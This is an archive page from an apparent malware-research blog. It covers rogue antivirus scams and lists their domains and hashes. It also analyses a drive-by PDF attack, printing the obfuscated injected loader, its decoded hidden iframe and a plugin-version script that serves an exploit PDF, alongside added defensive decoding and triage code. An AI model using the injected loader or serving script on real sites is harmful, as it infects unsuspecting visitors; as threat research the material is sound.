Archive for the 'Rogue Software' Category

13
Nov

Database Update - 16 Files (Low-Moderate Detection)

Another update for tonight. Should have more over the weekend. Find them in /pnuemo-malware/.

BE ADVISED: These URLs may still be active. Proceed at your own risk!


03
Nov

Antivirus Pro 2009 - Exploiting Human Weakness for Money

Note: The sites we talk about in this post distribute rogue (“fake”) anti-malware products. Do not visit, pay, or download the software discussed below.

Almost every day our viewers ask us about rogue anti-malware software. Of all the questions we receive, the most common is “When will these attacks stop?” The sad truth is that we cannot see an end to this problem in the near future. As long as malicious individuals are able to trick or force users into downloading, installing, and eventually paying for their fake “rogue” anti-malware products, they will continue to develop them and push the envelope.

AntivirusPro 2009

Antivirus Pro 2009

The user will be prompted with the following message in the event that the browser blocks the download.  When the user clicks on “Click here to get full advanced real-time protection and continue browsing”, it will automatically forward them to the payment gateway page.

“Insecure Internet Activity. Threat of Virus Attack!  Due to the insecure Internet browsing your PC can easily get infected with viruses, worms and trojans without your knowledge, and that can lead to system slowdown, freezes and crashes”

Antivirus Pro 2009 Browser Warning

Installer:

The Antivirus Pro 2009 installer offers three options: Continue, Terms of Service and Cancel.

Antivirus Pro 2009

Canceling the Installation:

When attempting to exit the installer via the cancel button, the setting defaults to “Continue with installing and running free scanner.”

Antivirus Pro 2009 Cancel Install

Terms of Service:

Antivirus Pro 2009 Terms of Service

Interface:

The interface may look convincing to unsuspecting victims.

Antivirus Pro 2009 Interface

Scare Messages:

Victims are presented with various scare messages to entice a purchase.

“WARNING! Antivirus Pro 2009 has found 27 useless and UNWANTED files on your computer!”

Personal data at the reach of anyone’s hand

Internet history records available

Compromising and adult material stored on your system

Chat sessions’ logs and personal Emails easily reachable

Antivirus Pro 2009 Scare Tactics

Payment Gateway:

hxxps://secure.soft-payments.com via AS20495 (WEDARE We Dare BV Autonomous System)

secure.soft-payments.com

Antivirus Pro 2009 Payment Gateway

SharedNS:

Antivirus Pro 2009 Shared NS

VirusTotal:

7/36 (19.44%) -> hxxp://www.av-pro-2009.com

7/36 (19.44%) -> hxxp://xp-as-2009.com

11/36 (30.56%) -> hxxp://xpas-2009.com

16/36 (44.44%) -> hxxp://av-pro2009.com

16/36 (44.44%) -> hxxp://avpro-2009.com

16/36 (44.44%) -> hxxp://avpro2009.com/

Removal Information: Need help removing this malware?
Click here for more information on the removal process.

Don’t forget to ask for help in our user forums!

24
Oct

Database Update - 28 Files (Moderate Detection)

Here is an update of files from this past week. These files are available in /pnuemo-malware/ in our repository. PLEASE READ UPDATED README.TXT!

BE ADVISED: These URLs may still be active. Proceed at your own risk.


Removal:
Remove this threat with MalwareBytes!

13
Oct

Internet Exploitation Adventure

This post shows the lengths people will go to in order to install malware onto computers. We will show how visiting one website will take you on a journey to many websites that will check your computer for vulnerable software and, if any is found, install malware on your computer.

First, there is a list of the domains involved in the exploit adventure. Simply visiting hxxp://defendmycreditunion.org will start this process. Hidden iframes then load websites that scan your computer for vulnerabilities and, if they can’t, redirect you somewhere else. These websites are still active, so proceed at your own risk.

The links on this page DO NOT link to the infected website. They are anchored links further down the page that make the analysis easier to view. The links just below are listed in the approximate order in which they would load while exploiting the machine.

BE ADVISED: The actual domains may still be active. Proceed at your own risk!

The picture below shows a visual map of how the pages are loaded.


16
Sep

Virus Response Lab 2009

Note: This site is distributing a rogue (“fake”) anti-malware product. Do not visit, pay, or download the software discussed below.

Virus response Lab 2009

Site:

* hxxp://viruslabs2009.com/

File: virlab_install.exe
VirusTotal: Result: 9/36 (25%)
File size: 1579973 bytes
MD5…: 93fef280425ad6fb002430abb8cf216d
SHA1..: 766a414faa1e062c0ce40f1ede93a3d166902b6c
SHA256: 4346309f29aacf14cd0fc764ccac674572a498b7f80e1a4018265008cbf1ba4c
SHA512: 371d231b30c32756be1dbd5b50e26144d506abe895a6893fdcea866b8353e310
8548ded05366e25c2d968dffa506880e8729b7b8a6b4f4e06c3814d903eba37e
PEiD..: -
TrID..: File type identification
Win64 Executable Generic (59.6%)
Win32 Executable MS Visual C++ (generic) (26.2%)
Win32 Executable Generic (5.9%)
Win32 Dynamic Link Library (generic) (5.2%)
Generic Win/DOS Executable (1.3%)

MDB: /stingner-malware/

Removal:

Remove this threat with MalwareBytes!

04
Sep

Antivirus 2009…brought to you by Motigo

A colleague called me today stating that his website was the victim of a hack and he did not know what to do. He was frantic and said that his website was distributing Antivirus 2009, so I decided to take a look at it and lo and behold, we found Antivirus 2009 being distributed from Motigo’s ad system.

For those who don’t know what Antivirus 2009 is, it’s a rogue (fake) security product. You can see a video of it in action here.

*Update* We have noticed our keyword search hit for “quickupdates” has increased 70% of our total keyword hit statistics over the past 24 hours. If you are viewing our site as a result of experiencing this pop-up, please leave us a comment and be sure to include what site you were on at the time.

We traced the AV09 pop-up down to the following JavaScript counter code.

The ID has been removed to protect the victim’s identity.

<!-- Begin Motigo Webstats counter code -->
<a id="*" href="hxxp://webstats.motigo.com/"><img src="hxxp://m1.webstats.motigo.com/n.gif?id=*" border="0" alt="Free counter and web stats" width="18" height="18" /></a>
<script src="hxxp://m1.webstats.motigo.com/c.js?id=*" type="text/javascript"></script>
<!-- End Motigo Webstats counter code -->

Resulted in this pop-up being displayed on his site:

Antivirus 2009 via Motigo

Clicking the pop-up brought us to:

hxxp://quickupdates29.com <-- don’t go here

Antivirus 2009 via Motigo

File distributed:

File: AV2009Install_*.exe (0570484B66E9A139D8FD0A71F5448957)
MDB: /lithium-malware/AV2009Install.zip

The Motigo webstats counter code is responsible for several pop-ups, and one of them is Antivirus 2009. This is a scary thought. This means that everyone hosting this code on their website can potentially infect their viewers/customers. This is an extremely cost-effective distribution method for the malware creators and I bet we will see more like it as time goes by.

Important note to website owners!

If you are going to use any service (free or paid), you’d better make sure you understand all of the terms and conditions. It’s not unusual for free services to be accompanied by ads or pop-ups, but you must ask yourself the following questions before putting anything on your site.

1. What is the service provider’s privacy policy?

2. What are their terms of service?

3. How do they screen their affiliate links for malware/phishing attacks?

Finally, it’s important to see what their users think of the service. As we can see, Motigo has a laundry list of pop-up complaints:

Related News: PandaLabs reports on the sudden increase of rogue (fake) security products. -> Report

Removal:

Remove this threat with MalwareBytes!

31
Aug

Adobe Acrobat Reader PDF Exploit (gnu.pdf & us.pdf) (UPDATED)

This morning we found a website that automatically loads an infected PDF file.

When the user is directed to the infected site, there is a hidden iframe that loads the pdf file. Here’s what happens…

Links still live, proceed at your own risk.

The user visits hxxp://120.50.46.90/~admin/tps/index.php and the following obfuscated code is included:

<script language="javascript">document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%36%39%2E%34%36%2E%32%37%2E%34%31%2F%61%66%78%76%2F%74%70%76%2F%69%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%22%3E%3C%2F%69%66%72%61%6D%65%3E'));</script>

When deobfuscated:

<iframe src="http://69.46.27.41/afxv/tpv/index.php" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
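The same decoding can be done statically, without letting the page's script run. The following is an added example, not code from the original post: it peels `document.write(unescape(...))` layers out of saved page source and reports iframes a visitor could not see. The function names and the `.example` sample page are assumptions made for the illustration.

```javascript
// Added example: peel document.write(unescape('...')) layers statically,
// without running any of the page's script, then flag hidden iframes.
const WRITE_UNESCAPE =
  /document\.write\(\s*unescape\(\s*(['"])([\s\S]*?)\1\s*\)\s*\)/g;

// Decode %XX and %uXXXX like the legacy unescape(); malformed escapes are
// left as they are instead of throwing (decodeURIComponent would throw).
function legacyUnescape(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (_, u, b) => String.fromCharCode(parseInt(u || b, 16)));
}

// Replace each call with the markup it would write; repeat for nested
// layers, bounded so a self-reproducing payload cannot loop forever.
function peelLayers(source, maxDepth = 5) {
  let current = source;
  for (let depth = 0; depth < maxDepth; depth++) {
    let changed = false;
    current = current.replace(WRITE_UNESCAPE, (_, quote, payload) => {
      changed = true;
      // Drop line breaks introduced when a long literal is wrapped.
      return legacyUnescape(payload.replace(/[\r\n]+/g, ''));
    });
    if (!changed) break;
  }
  return current;
}

// Read one attribute from a start tag (quoted or bare value).
function attr(tag, name) {
  const m = new RegExp(
    '\\s' + name + '\\s*=\\s*(?:"([^"]*)"|\'([^\']*)\'|([^\\s>]+))', 'i').exec(tag);
  return m ? (m[1] || m[2] || m[3] || '') : null;
}

// Report iframes a visitor could not see: 1x1 (or smaller) or hidden by CSS.
function findHiddenIframes(source) {
  const findings = [];
  for (const [tag] of peelLayers(source).matchAll(/<iframe\b[^>]*>/gi)) {
    const reasons = [];
    const w = parseInt(attr(tag, 'width'), 10);
    const h = parseInt(attr(tag, 'height'), 10);
    const style = (attr(tag, 'style') || '').replace(/\s+/g, '').toLowerCase();
    if (w <= 1 || h <= 1) reasons.push('tiny');
    if (/visibility:hidden|display:none/.test(style)) reasons.push('css-hidden');
    // Defang the address before it goes into a report.
    const src = (attr(tag, 'src') || '').replace(/^http/i, 'hxxp');
    if (reasons.length) findings.push({ src, reasons });
  }
  return findings;
}

// Constructed sample, not the page's payload: a hidden iframe to a reserved
// .example host, percent-encoded byte by byte, next to a visible embed.
const encodeAll = s => [...s].map(
  c => '%' + c.charCodeAt(0).toString(16).toUpperCase().padStart(2, '0')).join('');
const HIDDEN = '<iframe src="http://kit.example/tpv/index.php" width=1 height=1 ' +
  'style="visibility:hidden;position:absolute"></iframe>';
const SAMPLE_PAGE = '<html><body><p>news</p><script language="javascript">' +
  'document.write(unescape(\'' + encodeAll(HIDDEN) + '\'));</script>' +
  '<iframe src="http://video.example/embed" width=560 height=315></iframe>' +
  '</body></html>';

console.log(findHiddenIframes(SAMPLE_PAGE));
```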

We can see the hidden iframe above and the page includes the following code…

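<script>
// Reader plugin version string; stays 0 when no Reader plugin is found.
ppdf=0;
i=0;
// Walk every installed browser plugin and read its description.
for(;navigator.plugins[i];i++)
{
    // Loosely matches "Adobe Acrobat Plug-In ... <version>".
    re=/.d.{2}e.A.{2}o.....l..-.+?([0-9]+.[0-9]+)/;
    if(res=re.exec(navigator.plugins[i].description))
    {
        ppdf=res[1];
    }
    // Loosely matches the Shockwave Flash description and version.
    var re=/.h.{5}v.+?s.\s([0-9])\S([0-9]).+?([0-9]{1,5})/;
    var res;
    if(res=re.exec(navigator.plugins[i].description))
    {
        flash=res[1]+'.'+res[2]+'.'+res[3];
    }
}
ppdfenable=0;
if(ppdf!=0)
{
    ppdfenable=0;
    // Keep only the digits of the version, e.g. "7.00" becomes "700".
    ppdf=ppdf.replace(/\D/g,"");
    // A first digit of 7 with a second digit of 0, or a first digit below 7, gets the PDF.
    if(ppdf[0]==7 && ppdf[1]<1)ppdfenable=1;
    if(ppdf[0]<7)ppdfenable=1;
    if(ppdfenable)
    {
        document.write('<iframe width=1 height=1 src="hxxp://69.46.27.41/afxv/tpv/gnu.pdf"></iframe>');
    }
}
</script>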
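The version gate in the script above can be replayed over plugin description strings as a triage aid, to see which installs it would have sent gnu.pdf to. This is an added example, not code from the original post: the function names, host names and description strings are constructed, and only the Reader pattern and the digit comparisons are taken from the script.

```javascript
// Added example: replay the script's Adobe Reader version gate over plugin
// description strings to see which installs it would have sent the PDF to.

// The pattern from the page's script; its wildcards spell out
// "Adobe Acrobat Plug-In ... <digits>.<digits>".
const READER_RE = /.d.{2}e.A.{2}o.....l..-.+?([0-9]+.[0-9]+)/;

// Returns { version, served, why } for one navigator.plugins description.
function readerGate(description) {
  const m = READER_RE.exec(description);
  if (!m) return { version: null, served: false, why: 'no Reader plugin matched' };
  const version = m[1];
  const digits = version.replace(/\D/g, '');       // "7.00" -> "700"
  // The script compares single characters, not whole version numbers.
  const first = Number(digits[0]);
  const second = Number(digits[1]);
  if (first === 7 && second < 1) {
    return { version, served: true, why: 'first digit 7, second digit 0' };
  }
  if (first < 7) {
    return { version, served: true, why: 'first digit below 7' };
  }
  return { version, served: false, why: 'newer than the gate accepts' };
}

// Hosts from an inventory of { host, description } that pass the gate.
function exposedHosts(inventory) {
  return inventory
    .map(e => ({ host: e.host, ...readerGate(e.description) }))
    .filter(r => r.served);
}

// Constructed inventory: host names and description strings are made up.
const INVENTORY = [
  { host: 'ws-01', description: 'Adobe Acrobat Plug-In Version 6.00 for Netscape' },
  { host: 'ws-02', description: 'Adobe Acrobat Plug-In Version 7.00 for Netscape' },
  { host: 'ws-03', description: 'Adobe Acrobat Plug-In Version 7.10 for Netscape' },
  { host: 'ws-04', description: 'Adobe Acrobat Plug-In Version 8.12 for Netscape' },
  { host: 'ws-05', description: 'Shockwave Flash 9.0 r124' },
  // Two-digit major: the first character is "1", so the gate treats it as old.
  { host: 'ws-06', description: 'Adobe Acrobat Plug-In Version 10.00 for Netscape' },
];

console.log(exposedHosts(INVENTORY));
```

Because the gate looks at the first character only, a version string with a two-digit major number passes it as well, so triage based on this logic should not assume that a higher version number was skipped.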

Thus leading us to the pdf in question located at hxxp://69.46.27.41/afxv/tpv/gnu.pdf. Here is additional information regarding this file. This is also available in /pnuemo-malware/.

gnu.pdf
Result: 6/35 (17.15%)
MD5: 213d20a0523b6ea6c93d4348a509c34c
VirusTotal

Update your software!

UPDATED 9/1 12p PST

us.pdf
Result: 10/36 (27.78%)
MD5: 8175212481f069a6dd54de9cbd044039
VirusTotal
hxxp://174.133.121.165/us.pdf
hxxp://88.85.95.134/us.pdf

29
Aug

Database Update (9 Files) Low-Moderate Detection

Here is a fresh round of malware found over the last couple of days. All information about them is listed. They are available in /pnuemo-malware/.

Websites are still live, proceed at your own risk!


25
Aug

Antivirus 2008 Pro XP

We came across a new domain name registered at estdomains today. This site may appear entirely legitimate, as it sports a support page, affiliate page, terms of service, etc. But we can assure you that it is a bad site. Be aware of this site and do not download any of the files associated with it! Site: hxxp://antivirus2008proxp.com

What it looks like:

Antivirus 2008 Pro XP

Removal:

Remove this threat with MalwareBytes!

19
Aug

The International Virus Research Lab Strikes Again!

Here are some new domains pushing out malicious binaries.  All of the files have been made available in /lithium-malware/AVXP08_1.zip

Screen shots:
hxxp://supersolution-freeantivirus.com/antivirus

antivirus2

avxp08

powerav09




